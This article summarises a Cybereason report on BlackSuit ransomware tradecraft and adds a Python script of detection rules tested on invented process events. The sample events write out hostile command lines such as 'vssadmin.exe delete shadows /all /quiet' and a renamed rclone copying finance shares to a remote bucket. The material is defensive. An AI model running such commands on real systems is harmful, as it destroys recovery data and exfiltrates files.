A recent Cybereason investigation has shed light on a coordinated and destructive ransomware campaign carried out by the BlackSuit ransomware group, widely assessed to be a rebrand of the Royal operation, itself built by former Conti operators. The campaign combines stealth, speed, and careful targeting of what gets encrypted, and is one of the more sophisticated ransomware operations seen this year.
“BlackSuit is a ransomware group that emerged in mid-2023, and is widely believed to be a rebrand or spin-off of the Royal ransomware gang,” Cybereason explains in their latest report.
Rather than encrypting and leaving, BlackSuit runs a three-phase kill chain: initial compromise and lateral movement, data exfiltration, and selective encryption, with volume shadow copies deleted beforehand to cripple recovery.
The observed attack begins with Cobalt Strike beacon deployment for command-and-control (C2) and lateral movement. The initial access vector remains unknown; analysts noted that the earliest malicious traffic originated from a device without a Cybereason sensor, suggesting it had already been compromised before the monitored activity began.
“Cobalt Strike is observed to be the primary attack tool utilized by BlackSuit ransomware,” the team noted.

To pivot laterally, BlackSuit used a combination of:
- PsExec.exe to distribute and execute payloads such as vm.dll and vm80.dll staged in the C:\Windows\Temp folder
- Remote service creation over RPC (the mechanism PsExec relies on), with the service running as SYSTEM
- Configure-SMRemoting.exe, a legitimate Windows utility that enables Server Manager remote management over WinRM, to open remote management sessions on target hosts
- Suspicious binaries such as frdke23.exe executed directly from network shares, with code injected via rundll32.exe into legitimate processes such as wuauclt.exe
These tactics let the attackers stay quiet while conducting widespread reconnaissance and payload deployment across the network: every step runs through a signed Windows binary or a well-known admin tool, so file-name-based detection alone sees nothing unusual.
The Cobalt Strike beacons were downloaded using PowerShell download commands.
The same C2 infrastructure was then used to deploy the final payload, the BlackSuit ransomware itself, through renamed files such as b.exe and vmware.dll.
One unusual characteristic was the use of the -nomutex flag during execution:
“Unlike typical ransomware behavior… the -nomutex flag disables mutex creation… enabling multiple concurrent executions — potentially for redundancy, faster encryption across sessions, or to bypass mutex-based detections.”
Before encryption, the attackers exfiltrated around 60 GB of sensitive data using a renamed copy of rclone.exe (disguised as vmware.exe). This reflects the now-standard double extortion pattern: data is stolen before encryption so that the victim faces a leak threat on top of the outage. Because the binary was renamed, detections keyed only on the file name miss it; the PE's original file name (recorded by Sysmon and many EDRs) and rclone's distinctive command-line syntax are the more reliable signals.
To sabotage recovery, the attackers used vssadmin.exe to delete volume shadow copies on the targeted hosts.
This was immediately followed by ransomware execution. The encryptor targets only specific file types and skips system-critical locations such as the Windows directory and the IPC$ and ADMIN$ administrative shares, so that hosts stay running and the ransom note can still be read.
BlackSuit's encryption logic is tuned for speed and stealth. The ransomware does not encrypt .exe or .dll files, nor files already carrying the .BlackSuit extension (which would otherwise be double-encrypted when the binary runs more than once), and drops a ransom note in the directories it touches.
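The lateral-movement, exfiltration, shadow-copy deletion and -nomutex behaviours described above each leave a distinctive process-creation footprint. The following is an added example, written for this page and not taken from the Cybereason report or from any BlackSuit tooling, that encodes those behaviours as detection rules and runs them over a handful of constructed process-creation events shaped like Sysmon Event ID 1 records. The host names, share name, command lines and the `ProcEvent` structure are all assumptions made for the illustration; the rules generalize slightly beyond the report by also catching `wmic shadowcopy delete` and renamed PsExec, since both are common variants of the same tradecraft.

```python
"""Detection rules for the BlackSuit TTPs described in the article, run over
constructed sample process-creation events (no real telemetry is used)."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    original_name: str   # PE OriginalFileName, as Sysmon Event ID 1 records it
    cmdline: str


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def psexec_temp_payload(e: ProcEvent) -> bool:
    # PSEXESVC (PsExec's remote service) launching something staged in C:\Windows\Temp
    return basename(e.parent_image) == "psexesvc.exe" and "\\windows\\temp\\" in e.cmdline.lower()


def binary_from_share(e: ProcEvent) -> bool:
    # Executable launched straight from a UNC path (e.g. \\server\share\frdke23.exe)
    return e.image.startswith("\\\\")


def rundll32_spawns_wuauclt(e: ProcEvent) -> bool:
    # wuauclt.exe is normally started by svchost; rundll32 as parent is a proxy for injection
    return basename(e.parent_image) == "rundll32.exe" and basename(e.image) == "wuauclt.exe"


def renamed_tool(e: ProcEvent) -> bool:
    # Name on disk disagrees with the PE's original name (rclone.exe running as vmware.exe)
    watched = {"rclone.exe", "psexec.exe", "psexec64.exe"}
    return e.original_name.lower() in watched and basename(e.image) != e.original_name.lower()


def shadow_copy_deletion(e: ProcEvent) -> bool:
    cl = re.sub(r"\s+", " ", e.cmdline.lower())
    return (basename(e.image) == "vssadmin.exe" and "delete shadows" in cl) or (
        basename(e.image) == "wmic.exe" and "shadowcopy delete" in cl)


def nomutex_flag(e: ProcEvent) -> bool:
    # The -nomutex switch the report highlights; benign software has little reason to pass it
    return re.search(r"(?:^|\s)-nomutex(?:\s|$)", e.cmdline, re.IGNORECASE) is not None


RULES = [
    ("psexec_temp_payload", psexec_temp_payload),
    ("binary_from_share", binary_from_share),
    ("rundll32_spawns_wuauclt", rundll32_spawns_wuauclt),
    ("renamed_tool", renamed_tool),
    ("shadow_copy_deletion", shadow_copy_deletion),
    ("nomutex_flag", nomutex_flag),
]


def scan(events):
    """Return (rule, host, image basename) for every rule that fires on every event."""
    return [(name, e.host, basename(e.image)) for e in events for name, fn in RULES if fn(e)]


# Constructed sample events; hosts, share and command lines are invented for this example.
SAMPLE_EVENTS = [
    ProcEvent("SRV01", r"C:\Windows\PSEXESVC.exe", r"C:\Windows\System32\rundll32.exe",
              "RUNDLL32.EXE", r"rundll32.exe C:\Windows\Temp\vm.dll,Start"),
    ProcEvent("WS07", r"C:\Windows\explorer.exe", r"\\FILESRV\share$\frdke23.exe",
              "frdke23.exe", r"\\FILESRV\share$\frdke23.exe"),
    ProcEvent("WS07", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\wuauclt.exe",
              "wuauclt.exe", "wuauclt.exe /UpdateDeploymentProvider"),
    ProcEvent("SRV01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\Temp\vmware.exe",
              "rclone.exe", r"vmware.exe copy C:\Shares\Finance remote:bucket --transfers 16"),
    ProcEvent("SRV01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
              "VSSADMIN.EXE", "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent("SRV01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\Temp\b.exe",
              "b.exe", "b.exe -nomutex"),
    # two benign events that must not fire
    ProcEvent("WS07", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\wuauclt.exe",
              "wuauclt.exe", "wuauclt.exe /UpdateDeploymentProvider"),
    ProcEvent("SRV01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
              "VSSADMIN.EXE", "vssadmin.exe list shadows"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Each of the six malicious events trips exactly one rule and the two benign events trip none. In production the same predicates map directly onto Sysmon or EDR process-creation telemetry; the renamed-tool rule is the one that catches the rclone-as-vmware.exe exfiltration, and it works only if the original file name field is collected.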